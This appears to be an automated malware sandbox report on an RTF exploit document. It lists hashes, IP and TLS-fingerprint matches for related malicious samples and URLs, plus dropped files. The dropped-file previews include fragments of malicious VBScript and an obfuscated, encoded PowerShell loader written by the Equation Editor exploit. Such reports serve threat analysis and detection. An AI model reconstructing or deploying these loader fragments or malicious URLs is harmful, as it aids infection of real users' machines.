	https://c51k11nyj56k.pettisville.sbs/lander/FileRotator_ID428/download.php	Get hash	malicious	Unknown	Browse	104.21.91.122
	M_F+niestandardowy stempel.xlsx.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	rq0mVjR9ar.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	172.67.139.220
	https://220420241.blob.core.windows.net/web/index.html?id=999	Get hash	malicious	Unknown	Browse	1.1.1.1
	responsibilityleadpro.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	https://u44056869.ct.sendgrid.net/ls/click?upn=u001.nH1ryR-2Btr2av-2Bkfc8quLEXKlGRKFonctFf3nB-2FAP-2Bjae3IsQgCoKtK-2FQ57cEEmmhZzRyd07G16kQ6rsc4EaJT6S7Rh48kOVsBPHV-2Fkkk9Vfz7cojLOCLuj4sUGVMM7pbdmwtinmtiLhfYkhEkgve628OiJsccHyeYc3lkmkn6epsOmmj4-2Fi-2BWjxfm73m7vUzCOGnDWnQJBmmd6DmkDcfIw-3D-3DU_vL_MRfqZW9nS4IDBSHT8MfJfSAq9b0aOVvtJoUhpW1Ga8ePAnfV-2FfXwE0xIGnayeXag21qNKRc5VLcgMkPlIuCBf7Hi8EFUvj1-2FlklJpMLZNx1IQq8eO26tVdmeuxhGn-2B2zjA71oEkiC9pTrxX9Dz-2FMJk8mkJr62ye1KlBo-2B8fxBlVl-2B6T0POpB0GKoibGhcjh4Z-2FnPU453nMAkUkNy65MlaA-3D-3D	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	iwjvkEAIQa.rtf	Get hash	malicious	Unknown	Browse	172.67.187.200
	8jvTeVxooN.exe	Get hash	malicious	Babuk, Djvu, Vidar	Browse	172.67.139.220
	xF3wienia PO2102559-1.xlsx	Get hash	malicious	Unknown	Browse	172.67.215.45
CLOUDFLARENETUS	DEKONT.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	104.21.27.85
	https://c51k11nyj56k.pettisville.sbs/lander/FileRotator_ID428/download.php	Get hash	malicious	Unknown	Browse	104.21.91.122
	M_F+niestandardowy stempel.xlsx.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	rq0mVjR9ar.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	172.67.139.220
	https://220420241.blob.core.windows.net/web/index.html?id=999	Get hash	malicious	Unknown	Browse	1.1.1.1
	responsibilityleadpro.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	https://u44056869.ct.sendgrid.net/ls/click?upn=u001.nH1ryR-2Btr2av-2Bkfc8quLEXKlGRKFonctFf3nB-2FAP-2Bjae3IsQgCoKtK-2FQ57cEEmmhZzRyd07G16kQ6rsc4EaJT6S7Rh48kOVsBPHV-2Fkkk9Vfz7cojLOCLuj4sUGVMM7pbdmwtinmtiLhfYkhEkgve628OiJsccHyeYc3lkmkn6epsOmmj4-2Fi-2BWjxfm73m7vUzCOGnDWnQJBmmd6DmkDcfIw-3D-3DU_vL_MRfqZW9nS4IDBSHT8MfJfSAq9b0aOVvtJoUhpW1Ga8ePAnfV-2FfXwE0xIGnayeXag21qNKRc5VLcgMkPlIuCBf7Hi8EFUvj1-2FlklJpMLZNx1IQq8eO26tVdmeuxhGn-2B2zjA71oEkiC9pTrxX9Dz-2FMJk8mkJr62ye1KlBo-2B8fxBlVl-2B6T0POpB0GKoibGhcjh4Z-2FnPU453nMAkUkNy65MlaA-3D-3D	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	iwjvkEAIQa.rtf	Get hash	malicious	Unknown	Browse	172.67.187.200
	8jvTeVxooN.exe	Get hash	malicious	Babuk, Djvu, Vidar	Browse	172.67.139.220
	xF3wienia PO2102559-1.xlsx	Get hash	malicious	Unknown	Browse	172.67.215.45

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
05af1f5ca1b87cc9cc9b25185115607d	OKhCyJ619J.rtf	Get hash	malicious	Remcos, DBatLoader	Browse	172.67.215.45
	xF3wienia PO2102559-1.xlsx	Get hash	malicious	Unknown	Browse	172.67.215.45
	HFiHWvPsvA.rtf	Get hash	malicious	Remcos, DBatLoader	Browse	172.67.215.45
	New order-Docs0374.xls	Get hash	malicious	Unknown	Browse	172.67.215.45
	gmb.xls	Get hash	malicious	Unknown	Browse	172.67.215.45
	scripttodo.ps1	Get hash	malicious	Unknown	Browse	172.67.215.45
	payment swift.xls	Get hash	malicious	Remcos, DBatLoader	Browse	172.67.215.45
	bZA95up38s.rtf	Get hash	malicious	AgentTesla	Browse	172.67.215.45
	SecuriteInfo.com.Exploit.ShellCode.69.14498.22623.rtf	Get hash	malicious	Remcos	Browse	172.67.215.45
	SecuriteInfo.com.Win32.SuspectCrc.28876.20318.xlsx	Get hash	malicious	AgentTesla	Browse	172.67.215.45
7dcce5b76c8b17472d024758970a406b	iwjvkEAIQa.rtf	Get hash	malicious	Unknown	Browse	104.21.84.67
	xF3wienia PO2102559-1.xlsx	Get hash	malicious	Unknown	Browse	104.21.84.67
	New Order - DUBAI BURJ KHALIFA LLC - PRICE ENQUIRY - RFQ 60000764690.xla.xlsx	Get hash	malicious	Unknown	Browse	104.21.84.67
	Payment MT103.xls	Get hash	malicious	Unknown	Browse	104.21.84.67
	New Order .doc	Get hash	malicious	Unknown	Browse	104.21.84.67
	Remittance-Advice.doc	Get hash	malicious	Unknown	Browse	104.21.84.67
	shipping docs.doc	Get hash	malicious	Unknown	Browse	104.21.84.67
	Invoice.doc	Get hash	malicious	AgentTesla	Browse	104.21.84.67
	Gam.xls	Get hash	malicious	Unknown	Browse	104.21.84.67
	Invoice.doc	Get hash	malicious	Unknown	Browse	104.21.84.67

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (332), with CRLF line terminators
Category:	dropped
Size (bytes):	317735
Entropy (8bit):	5.077747710313139
Encrypted:	false
SSDEEP:	3072:jcjl2470C29btFVSqHRD4ii71yO1lQ014CTt1ns3wflGsZcfo0QA5PGpb8hG:jcz0CEtFVS8Rkii7191lF1rflGsZcfw
MD5:	6F23FBE5AD6B55F71CF0AAA3AE1A9787
SHA1:	7BDDFC3B02528E307DBE8C3400372E629EC78B8A
SHA-256:	699744A6554AC8C2FDA78CD827BE561DC899527F7B173F9E10BABE404CC67E9E
SHA-512:	FD6DBCC4FA568BA2CCD097FF923E571441B157FD48D4E6A8811A33A9E4ECF4B1AA3069B0A980B4FD0478525A29A71C9DFA98DAFFD0C2D4FCCF711EA33535BD76
Malicious:	true
Reputation:	low
Preview:	'..' Copyright (c) Microsoft Corporation. All rights reserved...'..' Windows Software Licensing Management Tool...'..' Script Name: slmgr.vbs..'....Option Explicit....Dim g_objWMIService, g_strComputer, g_strUserName, g_strPassword..g_strComputer = "."..Dim g_serviceConnected..g_serviceConnected = False....dim g_EchoString..g_EchoString = ""....dim g_objRegistry....Dim g_resourceDictionary, g_resourcesLoaded..Set g_resourceDictionary = CreateObject("Scripting.Dictionary")..g_resourcesLoaded = False....Dim g_DeterminedDisplayFlags..g_DeterminedDisplayFlags = False....Dim g_ShowKmsInfo..Dim g_ShowKmsClientInfo..Dim g_ShowTkaClientInfo..Dim g_ShowTBLInfo..Dim g_ShowPhoneInfo....g_ShowKmsInfo = False..g_ShowKmsClientInfo = false..g_ShowTBLInfo = False..g_ShowPhoneInfo = False....' Messages....'Global options..private const L_optInstallProductKey = "ipk"..private const L_optInstallProductKeyUsage = "Install product key (replaces existing key)"....private const L

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	4760
Entropy (8bit):	4.831175347448903
Encrypted:	false
SSDEEP:	96:ACJ2Woe5v2k6Lm5emmXIGbgyg12jDs+un/iQLEYFjDaeWJ6KGcmXoFRLcU6/KD:vxoe5vVsm5emdkgkjDt4iWN3yBGHUdcY
MD5:	A50F0B3600A83789D28B424D69626266
SHA1:	0183DA34933788FF97602C9DEA82F39CAD0697C2
SHA-256:	7B188A9EEAC0649E088208C137625F64175EDAC8AE7F25D8A0F8B5611C824A8A
SHA-512:	335DCAA6FE83BC0F492B353C036EA2A5CA52ECE628520A3E50BAF7C373D4CDBAC7585341D91D9B210C3EC4378525AA934CCB5BB418C4D776105FBB59F4873216
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE......%+./...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........%+./...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\IEinternetMonkeykisserpdf[1].htm

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	Unicode text, UTF-16, little-endian text, with very long lines (771), with CRLF line terminators
Category:	dropped
Size (bytes):	87404
Entropy (8bit):	3.7453013197533602
Encrypted:	false
SSDEEP:	1536:dDSNmU1lBHFcJUJI+YZb5bJ9Gmgz/+rtfRDFqz:dWYU1DHFUGmgURDFs
MD5:	7D10EC1C1964ECDE04B374A2B67F76D9
SHA1:	623952A09024AA36D47D92221C0E6A1E0BE47A68
SHA-256:	0EF0A9DF76D99F3791F53253266C46B4061D9E3E96D5C2B125A8AFE58EF4A577
SHA-512:	9561A92C8FC2BE513741D39602CBF4F60574506FC26411BAE5A9BB2F18C23519C8D0F83AD7294074C1FC94013EC147F227027AD9E7E43ED730C120B74C268958
Malicious:	false
Preview:	.......... . . . .o.n. .e.r.r.o.r. .r.e.s.u.m.e. .n.e.x.t......... . . . .d.i.m. .a.d.e.n.o.p.a.t.h.a..... . . . .d.i.m. .s.o.f.r.e.r..... . . . .d.i.m. .o.P.a.r.a.m.D.i.c.t......... . . . .'..... . . . .'. .A.b.o.r.t. .i.f. .t.h.e. .h.o.s.t. .i.s. .n.o.t. .c.s.c.r.i.p.t..... . . . .'............. . . . .s.e.t. .o.P.a.r.a.m.D.i.c.t. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".S.c.r.i.p.t.i.n.g...D.i.c.t.i.o.n.a.r.y.".)......... . . . .s.o.f.r.e.r. .=. .P.a.r.s.e.C.o.m.m.a.n.d.L.i.n.e.(.a.d.e.n.o.p.a.t.h.a.,. .o.P.a.r.a.m.D.i.c.t.)......... . . . .i.f. .s.o.f.r.e.r. .=. .1. .t.h.e.n......... . . . . . . . .s.e.l.e.c.t. .c.a.s.e. .a.d.e.n.o.p.a.t.h.a......... . . . . . . . . . . . .c.a.s.e. .d.e.s.q.u.i.c.i.a.r..... . . . . . . . . . . . . . . . .s.o.f.r.e.r. .=. .C.r.e.a.t.e.O.r.S.e.t.P.o.r.t.(.o.P.a.r.a.m.D.i.c.t.)......... . . . . . . . . . . . .c.a.s.e. .k.A.c.t.i.o.n.D.e.l.e.t.e..... . . . . . . . . . . . . . . . .s.o.f.r.e.r. .=. .D.e.l.P.o.r.t.(.o.P.a.r.a.m.D.i.c.t.)......... . . . . . . . .

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4yAaN[1].txt

Download File

Process:	C:\Windows\SysWOW64\wscript.exe
File Type:	Unicode text, UTF-8 text, with very long lines (11560), with CRLF line terminators
Category:	dropped
Size (bytes):	13516
Entropy (8bit):	4.748685095289122
Encrypted:	false
SSDEEP:	384:tT+Ty1CDycZZjFC7SCl35PVt/Cps014vyMoj14vyMoEstsK77RylabCfczS1d+mP:p0y1ay6Zjs7jh5PVt/os014vyvj14vys
MD5:	5620E946158DC8A553DA348BFDEAC4BF
SHA1:	3D8F35F19259EC84265DC4DB5BDA1ABCB6FA1A85
SHA-256:	2628315CF2F34BD1D7475FE78F38552B6330D14E49A923376133C5C519C4A743
SHA-512:	A6837DAE70B6B7A897D8BAA098EC550C545C436BB26883694C09FC5D21038FFA4A9571FE0081335AE4A6A180F717C53881AA69BEA8B0C8C983C3A2FFA231968D
Malicious:	false
Preview:	.. dim gaxeta , espairecimento , iracarura , oxymetria , entrudo , Cama , entrudo1.. espairecimento = " ".. iracarura = "" & oxymetria & espairecimento & oxymetria & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTre" & oxymetria & espairecimento & oxymetria & "QBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTre" & oxymetria & espairecimento & oxymetria & "QB3DgTreC0DgTreTwBiDgTreGoDgTre" & oxymetria & espairecimento & oxymetria & "QBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTre" & oxymetria & espairecimento & oxymetria & "QB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTre" & oxymetria & espairecimento & oxymetria & "QB

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{6C8F4896-7948-479F-8EE2-C642D1E95148}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	4.116511147360202
Encrypted:	false
SSDEEP:	48:ril+dUBekmoy9urQOQnSNrMnr5mR2ad3+Fga2qM+Sw:j0ekqItNrMNaN+Sxqr
MD5:	BF0816F9E04B125809ADFC1F629F4737
SHA1:	A4E5ADC88E9DFF034690E1E9BC071FE819FE50BA
SHA-256:	F6552885B848EE75B9FECB4C01AED575787339196B0448AFB9E7E9E7EC8696A5
SHA-512:	7A5518EA4D0536C15D33FC1E47D737F50ACE55780144EC11BF11E7B2A5FCD898AB0308DE201703091C155441759FE023E8884F99DBDC9CFE06C37100D9263BF9
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{06EA25DE-75E3-4F72-AE47-A5D92E692285}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B825B39E-30EA-42BE-B9C1-B80A5B85CB70}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	15872
Entropy (8bit):	3.5517882253904984
Encrypted:	false
SSDEEP:	384:Xa/IhX6NpN+KJCTKi3gtfEtlBRhv1IPUo7VBwZ:Th65+KJZtfejm8o7VqZ
MD5:	C0B922AB32DE68F3132C94B86280DC9F
SHA1:	BF7533AFB010DBC534745631668B929C143D186B
SHA-256:	979F7680EB91DBF15D5A60FFB3124C825F42175D3CCCE69E0BB6F64F6ABB4DFE
SHA-512:	39A2366B61BA5EC076ECD2536E9D02C07C31CEF1651FC804C6235FC47C5E9CAF15D630D1775D2A2C1AF4FD6246445AFB1610AD9E4451DA87881EF383A737527B
Malicious:	false
Preview:	..................1.6.6.2.3.3.8.4.5.;.8.~...@.+.].,.).9./.[.=.9.1.+.9.;.>.:.2.-...?.?.%.8.\|..^.0.=.'.~.6.?.?...#.?.>.-.&.].+.&.-.\|.(.'.'.%.&.;.3.2.5.;.?.&./.+.?.'.^.7.@.....!.\|.].2.?.\|.-.).(.[...%.?._.?.\|.0.,.3._.(.7.(._.\|.?..6..&...~.@.1.3.:...#.[.&.?.`.&.2.&.(.#.^.8.;...8.:.'.6.8.?.$.?.].&.-.0.`.8...1.1.9.[.?.%.1...,.6...3.%.).]._...(.].:.@.[.!.:.9./..8.>.#.2.>.;.%..0.%...-.7./.&./.,.9...$.2.@.$.[.[.:.?.%.6.@.;.0.^.^.(.,./.%.].7.;.$.8.~.?.#._.~.[.:.~.?.-.+.4.,.;.1.&...4.=.)...-./.^.?.3.:...;.?.!.~.7.8.5.&.2.,.?.?.1...%.&.~.6.~.#.%.3.3.$.5.=.=.\|.].&.$.&.8.4.7.>.5...8.\|.2.~.%.?.?.)...&.?.5.'.?....%.].?.1.?.9.\|.3.;.!...~.6.(.^...+.4.(.,._...).:./._.~.%.'.1.\|.4.!./.9.).$.2...$.6...9.-.<.6.\|.9.~.3.>.2.'.7.?.5.#.2.@.$._.0.~...?.?.'.1.@.4.?./.,.^.?.?.$./.(.+.%.<./.-......@.?.+.5.5.?.+.3.?.7.@...?.~.[.&.=.4.^.%.3.[.3._.'.@.[.!.[.).?.@.!.[._.=.#.].1.?...5.1.?.=.2.].;.~.=.?.-.0.8.`.%.?.'.`.~.'.1.&.2..!.?...<.?.).9.^.6.(.4.'.?.?.4.?.!.>.8...1.2.^.@...:.1.<.&.1.....-.,.`.4.[.....,...,.

C:\Users\user\AppData\Local\Temp\bxpyyz4e.uhs.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\h2yqq1dw.b0r.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\i5hkuwaz.vap.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\nb4qlr1g.wj0.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\SecuriteInfo.com.Exploit.ShellCode.69.19968.913.LNK

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:07 2023, mtime=Fri Aug 11 15:42:07 2023, atime=Wed Apr 24 07:23:59 2024, length=74864, window=hide
Category:	dropped
Size (bytes):	1199
Entropy (8bit):	4.54123277284065
Encrypted:	false
SSDEEP:	24:8toU3/XTbkbkTVHCNXU+zJemdHCNXU+9Dv3qYk7N:8tD3/XTQbAHCdhzJ9dHCdhcYiN
MD5:	5C0F2EF9C3874FD9A1672AA802C40483
SHA1:	BCC01EB53611E0E03C564240CE387169E6CC9489
SHA-256:	E3850214488460DADD310D0F4A4AF4044D429D9E3A13C5087B0FE62FC58CBF6E
SHA-512:	E682DE086C963DF6A21EE3159886FD65F55281CC734AC02C36B7F801B10FAFE84ECC6DEF421AE387A99562EC3248E4DAD6E62E219B4FCDDD4141059CD798BF06
Malicious:	false
Preview:	L..................F.... .......r.......r....=.. ...p$...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......X.B..user.8......QK.X.X.B...&=....U...............A.l.b.u.s.....z.1......WE...Desktop.d......QK.X.WE...._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.p$...X.C .SECURI~1.RTF..........WD..WD..........................S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...S.h.e.l.l.C.o.d.e...6.9...1.9.9.6.8...9.1.3...r.t.f.......................-...8...[............?J......C:\Users\..#...................\\562258\Users.user\Desktop\SecuriteInfo.com.Exploit.ShellCode.69.19968.913.rtf.J.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...S.h.e.l.l.C.o.d.e...6.9...1.9.9.6.8...9.1.3...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Generic INItialization configuration [folders]
Category:	dropped
Size (bytes):	129
Entropy (8bit):	4.838731640332567
Encrypted:	false
SSDEEP:	3:H9rbcNuL/KFulm4P8bcNuL/KFulv:H9rwzwC
MD5:	E857D9690618FB4F72DE82B27A5CDCB9
SHA1:	3FB3434E1B06A07D1C5C93DBCCC7298371FCFC72
SHA-256:	ECA754D1A6658935C5A737C707D1DF79ACD9C6CE0AED5438849CA38128901848
SHA-512:	8AEDF20572AF14CDDE5DD629BCCD0B7C16E794B8035A6A49785A3D7A3D2B05D2D469D45CE3E756B7A88C3FED1F221D68870665980166A8AC7659088BEFE2B5E9
Malicious:	false
Preview:	[misc]..SecuriteInfo.com.Exploit.ShellCode.69.19968.913.LNK=0..[folders]..SecuriteInfo.com.Exploit.ShellCode.69.19968.913.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.4797606462020307
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyQGJl+l0OlMW3sFlc3GHllln:vdsCkWtqJA2OR23H/l
MD5:	EB62D355909FD3DD98A808A4D456667D
SHA1:	71A4875D461DDDB4D9EFA05E2529D67E79E558C2
SHA-256:	4D2B40205AC6CB3AFBDEEFB9AB942DC5BBE581B45B78CEF5AB9AAA5AA64BD1CA
SHA-512:	542F99E4D15F040F434C609E2D95DE610EC2ABB8133C18A699DECE8F9490436FC5D4A86669AADFEF84FA8B8A901FD30323AA881D7B91B8B33C89AC4919CB578D
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

C:\Users\user\AppData\Roaming\luckymokeykissinglover.vbs

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	Unicode text, UTF-16, little-endian text, with very long lines (771), with CRLF line terminators
Category:	dropped
Size (bytes):	87404
Entropy (8bit):	3.7453013197533602
Encrypted:	false
SSDEEP:	1536:dDSNmU1lBHFcJUJI+YZb5bJ9Gmgz/+rtfRDFqz:dWYU1DHFUGmgURDFs
MD5:	7D10EC1C1964ECDE04B374A2B67F76D9
SHA1:	623952A09024AA36D47D92221C0E6A1E0BE47A68
SHA-256:	0EF0A9DF76D99F3791F53253266C46B4061D9E3E96D5C2B125A8AFE58EF4A577
SHA-512:	9561A92C8FC2BE513741D39602CBF4F60574506FC26411BAE5A9BB2F18C23519C8D0F83AD7294074C1FC94013EC147F227027AD9E7E43ED730C120B74C268958
Malicious:	true
Preview:	.......... . . . .o.n. .e.r.r.o.r. .r.e.s.u.m.e. .n.e.x.t......... . . . .d.i.m. .a.d.e.n.o.p.a.t.h.a..... . . . .d.i.m. .s.o.f.r.e.r..... . . . .d.i.m. .o.P.a.r.a.m.D.i.c.t......... . . . .'..... . . . .'. .A.b.o.r.t. .i.f. .t.h.e. .h.o.s.t. .i.s. .n.o.t. .c.s.c.r.i.p.t..... . . . .'............. . . . .s.e.t. .o.P.a.r.a.m.D.i.c.t. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".S.c.r.i.p.t.i.n.g...D.i.c.t.i.o.n.a.r.y.".)......... . . . .s.o.f.r.e.r. .=. .P.a.r.s.e.C.o.m.m.a.n.d.L.i.n.e.(.a.d.e.n.o.p.a.t.h.a.,. .o.P.a.r.a.m.D.i.c.t.)......... . . . .i.f. .s.o.f.r.e.r. .=. .1. .t.h.e.n......... . . . . . . . .s.e.l.e.c.t. .c.a.s.e. .a.d.e.n.o.p.a.t.h.a......... . . . . . . . . . . . .c.a.s.e. .d.e.s.q.u.i.c.i.a.r..... . . . . . . . . . . . . . . . .s.o.f.r.e.r. .=. .C.r.e.a.t.e.O.r.S.e.t.P.o.r.t.(.o.P.a.r.a.m.D.i.c.t.)......... . . . . . . . . . . . .c.a.s.e. .k.A.c.t.i.o.n.D.e.l.e.t.e..... . . . . . . . . . . . . . . . .s.o.f.r.e.r. .=. .D.e.l.P.o.r.t.(.o.P.a.r.a.m.D.i.c.t.)......... . . . . . . . .

C:\Users\user\Desktop\~$curiteInfo.com.Exploit.ShellCode.69.19968.913.rtf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.4797606462020307
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyQGJl+l0OlMW3sFlc3GHllln:vdsCkWtqJA2OR23H/l
MD5:	EB62D355909FD3DD98A808A4D456667D
SHA1:	71A4875D461DDDB4D9EFA05E2529D67E79E558C2
